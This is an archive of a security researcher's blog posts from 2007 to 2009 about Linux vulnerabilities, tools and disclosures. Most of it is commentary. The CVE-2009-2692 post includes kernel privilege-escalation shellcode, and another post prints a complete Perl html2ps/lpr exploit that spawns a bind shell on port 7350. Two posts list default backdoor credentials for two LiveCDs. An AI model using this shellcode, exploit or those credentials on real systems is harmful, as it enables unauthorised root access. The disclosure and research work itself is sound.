You can register FILE pointers, file-descriptors or
memory regions to a local_scope<> template and it
automatically closes/releases ressources when you leave scope
(also in right order).It is as easy as

local_scope<int> fd(open("/tmp/x2", O_RDONLY), close);

and you can use fd afterwards like you'd normally use
your descriptor. If you need to return due to some
other error condition, the file is closed when the
scope is left.Other ressources like lock's etc could easily
be added by extending local_scope<>.

rewrote Port Shell Crypter

2009-08-28T05:47:00.000-07:00

I rewrote PSC, a tool to upgrade plaintext and/or
sessions without a tty across networks (even via
multiple hops) to a full crypted pty based session.

It works by doing the handshake and crypto across
the terminal layer instead of using network calls. The whole
code does not need any networking functionality.
If you have a chained session from host A to D like
A -> B -> C -> D and before starting the session you start your
local psc tool on host A and as soon as on host D you start
the other endpoint, the full chain is encrypted and nobody
on B and C can see or modify what you are typing.
Evil administrators on intermediate hosts (B, C) might use
ptrace() or whatever to even sniff SSH sessions. Using psc,
this is not possible anymore.

First, I wanted to make some video (since it seems very hip
these days :) showing how a old gitweb exploit makes a full
pty crypto shell using psc so you could use 'mc' etc.
on it at the end. However, xvidcap has some lib requirements
which I cant give it on my machine yet without hours
of recompilation and so I thought I do the release old-school. :)

CRypted Administration SHell beta available

2009-08-21T05:58:00.000-07:00

You can download crash here.

I started this project during last hackweek in July 09 and
now found some time to finish it.
Login/password is cr4sh/cr4sh. If you have any major problems
please let me know, otherwise the release will be made
available to a broader audience.
crash has not yet been tested on slow/hanging networks
and I'd be interested in feedback whether the chunksizes
still do etc.

CVE-2009-2692 and android; mitigation

2009-08-15T03:16:00.000-07:00

Update:{ it seems like someone else have had more time than me
checking out the CVE-2009-2692 vulnerability and the -EINVAL
vs. -EPERM issue on android. As already stated below, one
should check the ELF loader and how it handles PT_LOAD
segments of 0-addr.And, it seems that it did the trick!
At least from reading their exploit.
I didnt test it but it looks good to me.}

I made up a reliable exploit for CVE-2009-2692 myself with a generic
kernel 2.6 x86-64 shellcode which has only a small stub in
asm and does the rest in C.
It works reliable across the various kernel versions and I hoped to pwn my android with it, but unfortunately it turned out that the running 2.6.27 kernel inside has proper mmap_min_addr set to 0x1000 so this bug is out of the game. There is no suid for a
PERSONALITY_SVR4 preload either. The thing that makes me
wonder is, that it returns -EINVAL instead of the common -EPERM,
so maybe some further research is required.
Maybe linking the ELF binary's PT_LOAD segment to 0 helps :)

The funny thing is that a lot "CVE-2009-2692 exploit" queries
from search engines point to this site and the crowd seem to have problems finding spender's wunderbar_emporium.tgz :-)

If you are looking for easy mitigation of the attack
on openSUSE systems, call

echo 0x1000 > /proc/sys/vm/mmap_min_addr

from a rootshell. Since there is no setuid pulseaudio or
SELinux installed on openSUSE, this kills any NULL ptr attacks.

A .note on CVE-2009-2692

2009-08-14T04:35:00.000-07:00

I recommend reading this posting.

I am usually not commenting on other ppl's bug-findings. 100% of the fame and honor should
go to Tavis Ormandy and Julien Tinnes. If spenders exploit is doing too much magic for you,
heres the simple code snippet, which, if mapped at 0x0 gives you root:

// threadinfo = $0xffffffffffffe000 & %rsp
// task_struct offsets: current->parent = 696 current->uid = 1080
void do_root_2_6_27_x8664()
{
        __asm__(""
        "xor    %rax,%rax\n"
        "mov    $0xffffffffffffe000,%rax\n"     /* find threadinfo */
        "and    %rsp,%rax\n"
        "mov    (%rax),%rax\n"                  /* threadinfo->task     */
        "mov    696(%rax),%rax\n"               /* task->parent         */
        "movl   $0,1080(%rax)\n"                /* task->uid = 0        */
        "movl   $0,1084(%rax)\n"                /* task->euid = 0       */
        "movl   $0,1088(%rax)\n"                /* task->suid = 0       */
        "movl   $0,1092(%rax)\n"                /* task->fsuid = 0      */
        "movl   $0,1096(%rax)\n"                /* task->gid = 0        */
        "movl   $0,1100(%rax)\n"                /* task->egid = 0       */
        "leaveq\n");
}

It doesn't disable SELinux or so, its just for understanding that for simple rootshell you only
need to give the parent of the exploit (which is usually the shell that started the exploit)
UID/EUID of 0. The code is a modification of shellcode I used in a bluetooth kernel
PoC exploit 4 years or so ago.The code will cause a segfault
to the current process which does not matter since we
only care about the parent shell which obtains its root privs.

So, how much magic is there with the exploit?

Greetings to the people at HAR, I am sad I cannot attend this time :(

pwned

2009-07-30T01:59:00.000-07:00

Today I proudly realized, while viewing Referer logs, I
have been nominated for the Best Privilege Escalation
Bug in the pwnie-awards for discovering and exploiting
CVE-2009-1185 (udev). The story behind that is that
I was frustrated to have no root-sex within the last
6 months or so (since postfix) and therefore
I started reviewing the glibc ELF loader for such which lead me
somehow to certain daemons such as nscd followed by
hald and finally udevd. I quickly realized that it missed
important checks but the impact was unknown to me since
it kindly denied my exploitation offers until I found my way in.

You might be surprised to hear that I am not really
a security guy and used to stay away from sec-con events,
even though I work in that field.
I rather see myself as a programmer with interest in coding
and reading other peoples code and its often funny to
watch and follow discussions by the "security professionals".

The thing that makes me actually commenting on this is the
nice coincide with the nomination of my hero Solar Designer. :)

unreadable comments

2009-07-29T02:29:00.000-07:00

Its possible that its just spam, but I receive a lot
of chinese/japanese or whatever comments to my postings.
Since I wont approve what I dont understand, I cannot
approve these. So, please comment either in deutsch
or in english.

A .note on local root exploits

2009-07-19T02:35:00.000-07:00

There happened a lot of weird things and discussions
during the last week. Not only a silly kernel/gcc
combination attack was published by my favorite VJ;
also a second issue was released by the google sec-team,
which unfortunally was inside the same program that spender
used as an attack vector in one of the videos.

At the end, its nice that there are (thanks god, I am not
alone in this world!) people who seem to like/care
about local root exploits. You should definitely
have a look at Julien's blog (pulseuadio as well
as the mmap_min_addr postings).I feel like _uh,ohhh_
that theres actually some people doing real things
beside all the web 2.o, XSS and similar sillyness.

As you might know (or not, who cares :) I like local
root exploits. Every now and then I try to find some,
and sometimes I am even successful. Not only two times
so far, as some blogs try to suggest. :-)
Surprinsingly it is not much harder than 10 years ago,
if we do not count overflow/memory corruption bugs.
The bugs just get more silly and most of the time they
require a combination of multiple minor flaws. But
thats exactly what makes the beauty of local root exploits.

Some people do not honour them. They argue that only
remote exploits are of interest. But these people probably
never run a cluster or one of the top500's or found themself
removing ssh backdoors on a weekend instead of having fun.

A local vulnerability deservs the same update urgency
as remote ones.

NULL ptr derefs are out!

2009-07-15T03:33:00.000-07:00

Today, I was diving through some foreign code, and this made me remember my
own mistakes:
...

        while ((start = strchr (start, '<'))) {
                start += 1;
                if (!start || !*start)
                        break;

...

funny, eh?

Do not follow me on twitter

2009-05-05T07:38:00.000-07:00

I just grabbed a login on twitter but I am probably
not going to publish something there. Its just
a place holder.

I reviewed a lot of messaging code (hal, upstart etc.) during the last few weeks
as a post-handling of the udev issue. I learned a lot and
thats great, but no new interesting issues so far.

New WWW censorship (f)laws in .de

2009-04-18T01:34:00.000-07:00

I am usually not into politics, but today its necessary and I
hope I am not forced too often to write such statements.
Its about the german government introducing censorship
into the WWW while big companies spy on their employees.
Instead of bringing law to the people, flaw is brought to
the people.

Das Ministerium für Gedöhns (O-Ton Ex-Bukasch) hat es geschafft
die deutschen Internetprovider zu Leymen. Brav unterzeichnen sie
in der Majorität Knebelverträge mit dem BKA (Quelle Wikileaks).
Komisch wie schnell soetwas geht, während Datenskandalen
und Misswirtschaft anscheinend nicht beizukommen ist.
Es ist wohl alles nur eine Frage des richtigen Leyms.
Nach bekanntem Muster werden mal wieder eine handvoll Perversitäten
oder Terroristen als Anlass genommen den Bürger noch
ein Stück mehr zu gängeln.

Mich würde rein technisch interessieren wieviel Latenz bereits
jetzt durch genannte Sperren, Filter, Bundestrojaner,
Vorratsdatenspeicherung, Legal-Interception Implementierungen usw.
verloren geht. Wahrscheinlich ruft mich die T deshalb drei
mal die Woche an, ob ich nicht auf VDSL upgraden möchte.

udev trickery (CVE-2009-1185 and CVE-2009-1186)

2009-04-16T01:57:00.000-07:00

While the security industry is making weird statements about
no-more-free-hugs and OSX vs. Windows exploitation fun,
I add my two cents on UNIX exploitation.

There have been two problems in all currently running udevd's
which are shipped on all major Linux distributions. Even if you
install selinux or other hardening mechanisms, you are at risk
(please see above screenshot on a targeted selinux config).

The first problem (CVE-2009-1185) appears since the origin of
KOBJECT_UEVENT messages are not verified, so any user can spoof
messages that udevd takes as granted from kernel. This allows
some trickery to create a device named /dev/random with permission
0666 but major and minor number of your root blockdevice. The rest
is code. Alternatively, CVE-2009-1186 could be exploited
which is a standard stack buffer overflow. Depending on the
configuration of the system CVE-2009-1185 can also be exploited
with weird network interface-names and alike so at the end,
chrooted/jailed or PrivSep'ed users have good chance to get a full rootshell.

sharpen your .NET skills

2009-03-24T08:16:00.000-07:00

I have had dozens of discussions about C#; being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmers code is correct.
The runtime might be buggy as well! I recently read an
article in the famous german iX magazine about security measurements
in .NET. One of the measures is the so called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example-server:

using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {

  private static void store(string key, Byte[] b)
  {
          try {
                  Console.WriteLine("Isolated storage @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
                  fs.Write(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
  }

  private static Byte[] load(string key)
  {
          Byte[] b = new Byte[256];
          try {
                  Console.WriteLine("IsolatedStorage load @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
                  fs.Read(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
          return b;
  }
  public static void Main()
  {
          Byte[] buf = new Byte[256];
          int cnt;

          string data = "";

          ASCIIEncoding ascii = new ASCIIEncoding();
          TcpListener l = new TcpListener(8080);
          l.Start();
          try {
                  Socket s = l.AcceptSocket();
                  while (data.Trim() != "quit") {
                          Array.Clear(buf, 0, buf.Length);
                          if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
                                  break;
                          data = ascii.GetString(buf, 0, cnt);
                          Console.WriteLine("Received: {0}", data.Trim());
                          if (data.StartsWith("store ")) {
                                  Array.Clear(buf, 0, buf.Length);
                                  if (s.Receive(buf, buf.Length, 0) == 0)
                                          break;
                                  store(data.Substring(6, data.Length - 6).Trim(), buf);
                          } else if (data.StartsWith("load ")) {
                                  Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
                                  s.Send(result);
                          }
                  }
          } catch {
                  Console.WriteLine("Exception!");
          }
          l.Stop();
  }
}

You can connect to the server on TCP port 8080 and
store/load data via the telnet interface for example.
Beside the easy of code and the fact that it treats
TCP streams like messages which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as it
should. So, depending on your configuration you can
obtain funny results. On a openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/[some-hash]/.

An attacking scenario is inside the xterm.
I already informed the maintainers and a fix is underway.
Its not a big issue, and I dont have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.

File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.

Additionally, the managed runtime may provide
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.

PcapSharp updated

2009-03-20T11:59:00.000-07:00

You can find a new pcap# version of my mono pcap binding
on my website. Its better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the pcap# dump-files with
tcpdump and wireshark. I am not an expert for Marshalling
C# types to plain C types, but I think I got it right :-)

Some news

2009-03-10T09:47:00.000-07:00

This post satisfies two needs (except publishing code at all):


First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of me for historical, technical
and educational purposes. A recent law-case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themself etc..
It is illegal to publish such code in order to commit a crime
which is clearly and obviosuly not what I am doing.

The code is that old (2002), that there should rarely be any box at all
which still ships the vulnerable print-filter that is exploited
here. So, except for teaching something this code is useless.
The interesting thing about this piece is that the printfilter didnt
accept spaces in the IMG-tag. But read yourself:

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)


sub usage
{
        print "\n$0 <printhost> <remote-host>\n".
              "\tprinthost   -- name of printer in /etc/printcap\n".
              "\tremote-host -- IP or hostname of host where shell appears\n".
              "'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
        exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
        exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);

James Bond seriously wounded in action

2009-02-06T07:09:00.000-08:00

I am impressed. The readers of this little blog still seem to be what they learned as a kid on foreign
Sun's. Guerilla :-) No comment on my postings, never, or at least very rarely. But, its really read!
The last posting produced > 700 hits in less than 2 days to the perl code morphing example.
Without actually really announcing it somewhere at big places.
Cleaned from accesses of the google-bot etc there is still ~ 700 hits. Thats great!
So, I will continue. From time to time :-)

As a thank-you I will post a picture I took at a car park on one of my walks through the city together with
a good friend of mine. We used to take large walks of about 3h or so mostly in urban places,
dumpster-dive or attend on closed conferences or events where we were never invited at, shaking hands
with some big NATO generals for example. Its just a matter of who you say you are.

$_='print"\$_=\47$_\47;eval"';eval

2009-02-04T02:34:00.000-08:00

If you enjoy self-generating, self-replicating or self-modifying code as much as me,
you can have a look here. The exponential more-perl engine is probably
never executed in the 5th generation, except you have plenty of RAM
and CPU power (e.g. you work for google:).
All samples you can download execute the same code at the end, even though
they need to un-nest and reorder the instructions until original code,
including comments, is reached.

IPv6 NAT

2009-01-28T04:46:00.000-08:00

During my last ITO project I worked on a solution to implement some kind of NAT
for IPv6. Packet-mangling solutions such as netfilter are missing IPv6 NAT for a good
reason: One of IPv6' design goals was the end-to-end principle and NAT often puts
people in the wrong feeling of security. NAT is one major reason why VoIP-breakhrough
came so late.
However, transparent proxying and redirection of connections is also done via NAT,
and thats where NAT for IPv6 makes sense: to setup SPAM-traps, transparent
virii-scanning or HTTP proxies. My solution works on Linux kernels >= 2.6.14,
running as a normal user-space daemon.

Happy new 2009!

2009-01-07T01:38:00.000-08:00

Recent 25c3 was a funny event, although I missed a couple of friends to talk to.

So, I could use some time-slots to talk to the OpenBSD folks about security,
which is always funny. Beside our differences about the meaning of exploitability,
they nevertheless do a good job and I highly respect their voluntary work, in
particular in a $$-driven (security-)world. Even on such event, about 2/3 of
the folks only talk about $$ and what kind of customer is waiting for new
'solutions'.
Thanks to the french telco guys for the free beer and the funny stories.

SSHv2 trickery

2008-12-22T02:29:00.000-08:00

Current SSHv2 implementations suffer from a 'vulnerability' that allows traffic analysis
to match incoming and outgoing connections from a box. In case you use a SSH shell
on some box for anonymity before you SSH to some other box, a global observer
may correlate the traffic on the end-box and the box in between to find out
who actually connected to the end-box. Especially by observing packet sizes
and time differences of the connection, it is possible to see when something is typed
and what amount of output comes back. This works no matter of how many
hops are in between. It is then possible to finally find out the originating IP address.
SSHv2 specification was not really designed for anonymity or measures against
advanced traffic analysis, even if they have SSH_MSG_IGNORE packets.
I wrote a patch that adds constant delay and packet-size to the connection no matter
whether something is typed and how much is done one the connection.
You can find it here.

PAM spam

2008-10-22T02:38:00.000-07:00

About PAM, the cool Pluggable Authentication Modules common across
all major Linux dists.

I recently was involved in a project that used PAM to authenticate users via some
special kind of hardware. A note to developers and reviewers: keep in mind
that pam_syslog() and pam_prompt() expect a format string as argument.
In case you write your own log-wrapping code which expects format strings itself,
you still need to pass resulting strings via the "%s" format specifier to these pam functions!
Keep in mind that attackers may pass
strings like "%%s%%n" to the first (correct) format-resolver which open a format string vulnerability
to following incorrect calls as it is shrinked to "%s%n".

Linus blogs!

2008-10-13T01:22:00.000-07:00

It has been once more proved to me that blogs are, most of the time, not really
worth reading. Especially if they do not cover any technical or scientific details
(such as this posting :). Even more weird, a blog about family stuff and dogs
which is interesting like a XSS-attack inside cat. Really worth announcing it at heise news.
Apparently even more worth for people to reply with 100's of comments for such postings.

postfix trickery

2008-08-13T03:10:00.000-07:00

Eventually, after years of research, I was able to add postfix
to my personal list of the exceptional exploited programs (exexpro) }|-)

As of now, updates are already available. CVE-2008-2936 and CVE-2008-2937
have been assigned to this issue. My dear colleague Thomas will have sent an advisory out today
(writing this one day before the CRD).
So far, my exexpro list has grown to contain the following (random order):
Postfix, rsync, traceroute, modprobe/kernel, vixie crontab, suidperl, sudo, lpr, cups,
ppp, ippp, LIDS, hylafax, racoon to just name the more popular ones. Some of them appear multiple
times, some of them only affected BSD systems. The OpenBSD team was so kind to
offer me a poster for a local root exploit in ppp years ago. Additionally,
dozens of less popular programs appear on the list such as
imwheel, kreatecd, dip, wmcdplay various other K* programs etc. For all of them I wrote an exploit.
I am not able to provide exploits anymore due to the new law about this in Germany.
The exceptional exploited also contains weak implementations of secure protocols (SSL, SSH)
or weak protocols itself (CHAP) or absolutely uncommon exploits (see last posting for instance).

Lets hope that I can continue the trickery list in future and let the targets be smart and
popular. Only the minority of issues have been overflow or related bugs, BTW.

I hope you enjoy non-XSS related issues :-)

OpenSolaris remote root exploit

2008-08-02T09:29:00.000-07:00

Like the the BSI was new in the LiveCD market segment, so is Sun!

If you boot your OpenSolaris CD and have your network plugged in and a DHCP
server is available (very common setup today; every homeuser got DSL ...), remote
attackers can log into your machine with jack/jack and su to root with
opensolaris. What a luck that remote root logins are disabled by the sshd running
during the installation procedure. It also has a nice banner which distinguishs it
clearly from the rest of the OpenSSH world.
Far more bad than the BOSS BSI issue:
If you want to install OpenSolaris (and a plenty of sysadmins will do) the only
way is to boot the LiveCD and install it from there. You are owned before your installation procedure is finished!

So, somehow, we got a remote root exploit for a lot of data centers I guess. And BTW,
if there is no DHCP server running at the university, attackers can feel free to setup one :-)

Beside that, I like the Open Source path which Sun is now walking on and Solaris
is still a very cute OS which kicks ass. But admins should really unplug
the network cable during installation. No kidding. If I got something wrong, feel
free to mail me and I will correct myself. I tested the 2008.05 image from their main download
site.

Update: Sun Microsystems is already tracking this issue and will change the behavior with
the next live CD release.

I notify ...

2008-07-10T06:37:00.000-07:00

I wonder it took so long to discover that DNS is vulnerable to a birthday attack :-)
A 16 bit ID in the DNS header never added any security and I doubt that source port randomization will.

Anyway... While I was hunting down some race conditions recently I remembered the
new inotify(2) system calls in recent Linux 2.6 kernels. Some of you might not be aware of
this, but this is an excellent way to win races. Beside that you can re-write tmp-watch to work
really reliable. While up-to-then tools (including my own) needed to rescan directories to find out changes
which was prone to error and racy in itself, you can now watch the lifetime of a file from creation,
during chmod until closing. The short screenshot shows the basics.
You can download the small helper program here.
It is very interesting to watch mail and print spoolers using this program! :-)
If you find any exploitable tmp-races using my program, feel free to credit and inotify me :-)

rsync xattr item_list heap overflow

2008-04-14T06:10:00.000-07:00

Last week I discovered a classical integer wrap around which leads to a heap
overflow in rsync 3.0. A source patch can be found here.
We backported the xattr feature to some of our 2.6.9 and 2.6.8 versions.
Even though the code base is different there, the vulnerability also exists.
Updated packages will soon be available.

BOSS 2.0 LiveCD owned / Bundestrojaner entdeckt

2008-03-18T05:50:00.000-07:00

The BOSS LiveCD (BSI OSS Security LiveCD) is a bootable Morphix Linux
distribution basically with a nessus scanner and some other security tools.
Its distributed for administrators to check their network for vulnerabilities.
The aim is to make the network more secure.

However there is a backdoor: If you boot this CD in your network it sets up
the network interface(s) via DHCP. It also starts an OpenSSH daemon and guess what,
it has a DSA private key for the user 'slad' placed in slad's homedir. The passphrase
for this key is 'bosscd'. And... the root password to su to root after ssh login
(root login via SSH is disabled) is also 'bosscd'.
One may argue that this is a LiveCD system and this does not matter. Wrong! The laptop
you boot has got a harddisk! And you are behind the firewall!

So, if you are responsible for your network, DO NOT BOOT THIS CD. You are subject to
immidiate owning. It is very easy to scan whole class A networks for this DSA key
within a short period of time, so do not think that "just running it half a hour" is short enough
for you to survive.

More info about the BOSS CD/Bundestrojaner here.

Update:
After contacting the "Bundesamt für Sicherheit in der Informationstechnik" (BSI) they responded
and included a security notice about the LiveCD in their website. Although I do not think
that, due to automatic WLAN setup during boot, a splitted testing environment is possible,
I recognize that they reacted within one day which is very fast for a government agency.

Open Source Software Security Wiki

2008-02-20T06:22:00.000-08:00

A new resource for security researchers, maintainers and people who discover flaws in general
has recently been set up by the Openwall project. I have just added it to my link section.
You can already find useful information there such as contact addresses for various security
teams, such as ours. Hopefully, since its wiki style, there soon appear code review reports,
tools and PoC's :-) They also drive a mailing list to discuss technical issues.

Mono trickery

2008-02-18T05:26:00.000-08:00

I always spot the best bugs during coding. While coding tjmd5 (see last posting) I ran across
an interesting mono feature. For each 'foo' C# file that it compiles it lookups 'foo.so'
in /usr, /usr/lib etc directories and 'foo.so.la' in the cwd. This can be abused to execute
arbitrary code while someone is just compiling an C#-file. I am not sure about the impact since
you can say that the dude is executing the .exe after he was compiling it. Well.
Depending on the comments you all make I will decide whether this is something to tell Miguel :-)

Trapper John MD5

2008-02-18T05:21:00.000-08:00

During hackweek in Nuremberg I lifted my C#-skills and wrote a MD5 based filesystem
and web integrity checker from scratch. In .NET, from scratch means you plug a few classes
and API calls together and get a complex application in 100 lines :-)
C# is fun coding nevertheless. Never heared again from tripwire, one of my faves
back in the 90's. You can download trapper john md5 here.

Fail!

2008-01-30T04:42:00.000-08:00

While reading planet security
to get updated about what ubercool bugz the scene is producing I stumbled across the
fail blog. Definitely worth reading :-) Especially "wet squirrel" was funny after
serious and hard work on vlock which I had a look at. "Satellite" shows that hardware-engineers
are experiencing the same problems as computer scientists with software: it crashes all day long.
Heads up guys!

The evilness of setuid(getuid())

2008-01-29T01:42:00.001-08:00

We recently had a discussion after a code review that a setuid(getuid()) inside a suid without error checking
and program execution afterwards should be fixed. A lot of people think that this could
never fail. getuid() indeed can never fail, but setuid() can. Lets put aside theoretical issues such
as missing CAP_SETUID or signals and lets have a look how the kernel is executing a setuid()
in the first picture. CAP_SETUID should be ok since we talk about a setuid root program which is
executing setuid(getuid()). Obviously we can trigger an error return of EAGAIN if set_user() fails
which is only called if the real UID is changed during the call. That may only happen if some of the set*uid() functions with a different UID than at startup time of the program has been called already.
For instance a setuid root program runs at startup with the real UID of the user and calls setuid(0)
in order to to obtain full privileges. It then calls setuid(getuid()) to drop the privileges again.
How can this fail? Lets have a look at set_user() in the second picture. Obviously if the
RLIMIT_NPROC limit is exceeded and its not setuid'ing to root (which is the case) then
an error is returned. Huh! Lowering limits is always allowed ;-)
The sample program in picture three demonstrates how a setuid root program dropping
its privileges in this way can be tricked into executing other programs as root.

I apologize if you already knew this trick. I also apologize for the madness of this' blog
editing program which always places the pictures as it wants to and which makes me nuts.

FireBox

2008-01-23T02:05:00.000-08:00

In case you are tired of yet another unknown web browser vulnerability, you might
try firebox. This small script sets up a chroot environment for firefox which then runs
unprivileged, has no access to suid-files, /proc, /dev, /sys etc and can only create files
inside a loopback mount; so possible exploits triggered from evil websites can't modify
your homedir or system-files (as long as theres no kernel-0day of course :-).
Java, flash and all that sh** is not working yet but that might even be an advantage.

Happy new year!

2008-01-11T07:43:00.000-08:00

Although a little bit late, I wish every reader a happy new year!

The 24c3 event was great. I missed some old and known faces, but had some interesting evening
with an italian a french and a dutch hacker at a steak house restaurant. Never made and heared so
many jokes on software. :-)

Even in the new year I am continously asked by the famous hakin9 magazine
to write an article for them. There must be a rumor/confusion somewhere about my person -- I am not a hacker! :-)

boot graphs

2007-11-26T01:11:00.000-08:00

The exec-notify program can be used together with the exec2dot script to generate program
calling graphs from booting or something like a KDE startup. Especially the boot process from a laptop
looks very interesting.
Sample graphs may be found here and here.

satire II

2007-11-21T05:10:00.000-08:00

Sorry, the following is only in german due to my limited native language skills :-)

Ich sass neulich in der S-Bahn auf dem Weg zum recurity-labs summit, um
ein paar Freunde wiederzutreffen. In der S-Bahn um mich herum lauter wirklich tolle Leute mit viel
Ahnung ueber Web 2.0, flat-rate-preise und natuerlich - BLOGS!
Dazu die Jungs mit den haengenden Hosen und dieser komischen Musik
(ey, alter - das ging so: uz, uz, uzz. Nee, warte... uzzzzz,uz,uz!) Man lese mehr dazu hier.

Da kam mir die Idee, unsere heutige Welt in einem kleinen Gedicht zusammenzufassen.
Den verantwortlichen Rapper fuer den Originalsong werden die Meisten sicher leidlich kennen,
auch wenn er einem im Radio mittlerweile seltener aufgenoetigt wird.
Wer wirklich gute Musik mag, vertieft sich natuerlich in die Gitarre von Mark Tremonti .
:->

genug geschwafelt:

Mein blog!
---------------

ich habe nichts zu sagen
und das kann ich nicht ertragen,
darum schreib ich das in - mein' blog!

ich gehe noch zur schule,
ich find das alles voll schwul hier,
das schreibe ich in - mein' blog!

besser gesagt geh' ich in die achte,
genau wie die bei der ich immer uebernachte,
wies war schreib ich in - mein' blog!

der typ aus der fuenften,
tut mich immer beschimpfen,
das schreibe ich in - mein' blog!

wenn ich gross bin werd ich politiker,
oder vielleicht auch filmkritiker,
wofuer ich mich entscheide, kommt in - mein' blog!

ich habe weder hefter noch anstand,
und beim tanzen mach ich handstand
ich habe nur - nen block!

Eyes on Exec reloaded

2007-11-20T05:41:00.000-08:00

10 years ago or so, I wrote a tool called "Eyes on Exec" (EoE) which was a kernel module for the 2.0, 2.2 and 2.4 Kernel.
It created a device /dev/exec from which one could read all the commands executed recently
including callers PID, EUID etc. Some simple hostbased IDS used this input to ensure that e.g.
pop3d never executed anything. It worked very well. Additionally, code reviewers (myself :)
found it usefull since you easily see if some daemons/applications execute shell programs
in a way that is not obvious to the auditor due to weird library calls. The famous modprobe bug
which used ping as a trigger was found by me with the help of EoE (google for rootprobe exploit).

2.2 times are gone, but the new 2.6 Kernel has a nice API called proc connector which allows
to register for certain events such as fork/exec etc. into the proc FS. One is then notified
whenever the questioned event arrives. Ever wanted to know what man really executes or how
acroread is handling mail sent from within a PDF? :-) Jump towards here.

Puzzle solved

2007-10-30T05:59:00.000-07:00

Of course you all found the bug I was talking about after I uploaded the correct
screenshot! ;-) Bash me. You even found minor other issues which should however
not be exploitable.
Nevertheless, wpa_supplicant has got an excellent code structure which is fun to review.
If you ever want to learn how to write your own TLSv1 implementation, have a look at their code.

Spot the fed^H^H^Hbug

2007-10-23T06:30:00.001-07:00

There is an interesting bug within wpa_supplicant's ASN.1 parsing. Usually, it uses the OpenSSL
libraray to obtain and parse the X509 certificates. However, it can be compiled to use built-in
X509 e.g. ASN.1 parsing routines to do so. Nearly all X509 functions use
asn1_get_next(). There is a buffer overflow condition within this function. Found it?
Make a comment!

P.S. Our packages do not use the vulnerable parsing code.

P.P.S. Puzzle-solving coming soon :-)